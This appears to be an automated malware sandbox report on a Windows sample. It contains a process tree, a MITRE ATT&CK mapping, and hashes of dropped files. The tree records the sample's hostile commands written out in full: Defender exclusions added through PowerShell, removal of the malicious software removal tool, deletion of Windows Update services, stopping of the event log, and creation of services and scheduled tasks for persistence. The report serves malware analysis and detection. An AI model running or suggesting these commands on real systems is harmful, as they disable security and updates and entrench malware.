C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2692

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2920

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3456

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3592
- C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
  "C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3396
- - C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe
    "C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:756
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3692
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3924
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2476
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4112
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3716
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2568
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1288
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2368
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3840
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1612
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:220
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1100
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:4612
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2740
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3996
- - C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe
    "C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3248
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1632
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1180
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3612
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1256
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:3172
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:4476
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:1220
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:4008
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:4412
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:4984
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:4408
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:1616
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4688
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1128
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:4828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4680
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3904
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:4772
- - C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe
    "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3252
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4800
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4288
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3720

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4064

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3140

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4200

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4032

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1292

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1188

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 697a577ff46dfadeed42ee8f29135f10 rnxodF6nn0+I5RD4vV9A+g.0.1.0.0.0
1⤵
PID:3464
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3444

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:328

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:936

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4904
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5088
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1480
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2372
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3924
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3812
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4952
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2384
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4520
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1288
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1028
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2844
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2964
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4680
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2572
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:220
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:5024

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:1984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4988caea7c1f679d1df1173d5a4afd4e

SHA1
15d9cddfde6c9b6e70d5b9a667cea78e87769fa0

SHA256
f313df10f67103a0652cc0c596cd85403f46a98240a886e375b07f436409000a

SHA512
f356cdd7fbf3eb998cec338aee38af077bf0c769c7bfc2b0deba1c309d88ce8daef90a35cce24bdc105d22b4eabe2f8962599dfadae8be80a2184f98627894e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qv1gzn20.oxx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
C:\Windows\System32\Tasks\dialersvc32

Filesize
3KB

MD5
354fa26bf838e9b94333eb167b6d14b2

SHA1
3c5c1938dc7fb08f2b3d2841fd66dc4aaf20cfe5

SHA256
76eb2ba5e2d2c57c9983357c1f4a079d7d44c9ff26419ad2df415d3ff07ae419

SHA512
8265c43cb260d8af1ca65553486b4a6ac89c9293a54d54fcf6ec1039ac6b830be633da0da7469728f9aef61da62f1bf139b82cdb2764a28d45ca14fd93c61023

Download Submit
C:\Windows\System32\Tasks\dialersvc64

Filesize
3KB

MD5
97edfe11fa0522918c98c708195125e9

SHA1
3cfcbd8e1eb6e90bcc367b06629eeb980ce1c4a7

SHA256
a1067529864d3371284d48f63b06ff5e9a2ec39d4d98fd201690f5b59e811081

SHA512
88f2a49a845079237730b27e3ea443dfa095753f013b7dc8fd473a52c9e31018332aac9c0c45d106a8b2a6f2758be0d517a12d02eab25db9802daec5a8204c7c

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
57ef6685f46699629f8df0215896309d

SHA1
978d266528e348db02af4c9f11bb0e9a9e301b77

SHA256
076e04bf9620edd194b5b5e7db73dd8d9613a7e6cfb6fa4c7c6341a13ccc1926

SHA512
a074ed8fef1e1e85530c03934ca9ade2c9a9e59c8b274f043ac86870ae5ef13e68a585bd58ef8add8f264dedd6fbf4a6e1f9979826f67c7308fb1d540693d8db

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
3ef34e2a370f7ac2be4a8a2124cfb8f0

SHA1
5346b5a22f7d99a3769dafb76747cd742e7b66c5

SHA256
20d1e38288674560d4bcc0da58b3998520e57341b29d4170badc883a73c1b2ba

SHA512
15afedf05b58dfe647dade98a656a166e2965d3b7b2acd78b4447a4db4cdf70893fd15e940b8383d5e764f024210baa320d5b1a91a2b9b05661e56b3801d0a4b

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
7b1fd653db3b9e00e26d4a1a0c82d89c

SHA1
ef2d7aaf6549cfc7cd346d2896b1c7e48383a103

SHA256
00ddf9f211a6ae3e5edb42958c6d2a71c990a1e0284c4d66c2c6117877510be8

SHA512
b02bc9f267ed219bc20df84b27d5b6f81b7a12f03e7a0df1e051993ef6904418fd7af0bea260f9763b65de8eb6dc8715af8feb26d9c0552c6edb416f88d543e8

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
bdaa27c943acc1fe869502898a2ba226

SHA1
3cc394b7d69b444f09bec86b176112e2d93a6d61

SHA256
a892457a6e71607fc61a20fd114f308c7db7a1bb0d30dfc3584569fbdd178823

SHA512
0ab03e981f0d835eddccb917a73a9812fd9c9d1bbff6c021c73773d66f976690ad21b732e2b05780fb1caebb2f6b82c3eaee9498dd76df3b9f934f3c5f76838e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/388-97-0x000001A59C030000-0x000001A59C05B000-memory.dmp

Filesize
172KB

Download
memory/388-98-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/616-90-0x00000239E9AB0000-0x00000239E9AD4000-memory.dmp

Filesize
144KB

Download
memory/616-100-0x00000239E9ED0000-0x00000239E9EFB000-memory.dmp

Filesize
172KB

Download
memory/616-101-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/664-93-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/664-92-0x000001E9E1D60000-0x000001E9E1D8B000-memory.dmp

Filesize
172KB

Download
memory/736-106-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/736-105-0x000001EE06060000-0x000001EE0608B000-memory.dmp

Filesize
172KB

Download
memory/956-112-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/956-111-0x000001CE751D0000-0x000001CE751FB000-memory.dmp

Filesize
172KB

Download
memory/1036-109-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1036-108-0x00000276A1120000-0x00000276A114B000-memory.dmp

Filesize
172KB

Download
memory/1056-128-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1056-127-0x0000019EE9980000-0x0000019EE99AB000-memory.dmp

Filesize
172KB

Download
memory/1064-131-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1064-130-0x000002338FB70000-0x000002338FB9B000-memory.dmp

Filesize
172KB

Download
memory/1212-134-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1212-133-0x00000291CC920000-0x00000291CC94B000-memory.dmp

Filesize
172KB

Download
memory/1224-136-0x000001CBF69A0000-0x000001CBF69CB000-memory.dmp

Filesize
172KB

Download
memory/1224-137-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1304-143-0x000001FE46140000-0x000001FE4616B000-memory.dmp

Filesize
172KB

Download
memory/1304-144-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1380-147-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1380-146-0x000001B0DC260000-0x000001B0DC28B000-memory.dmp

Filesize
172KB

Download
memory/1388-149-0x0000019171780000-0x00000191717AB000-memory.dmp

Filesize
172KB

Download
memory/1388-150-0x00007FFD4D3B0000-0x00007FFD4D3C0000-memory.dmp

Filesize
64KB

Download
memory/1612-77-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1612-76-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1612-78-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1612-79-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
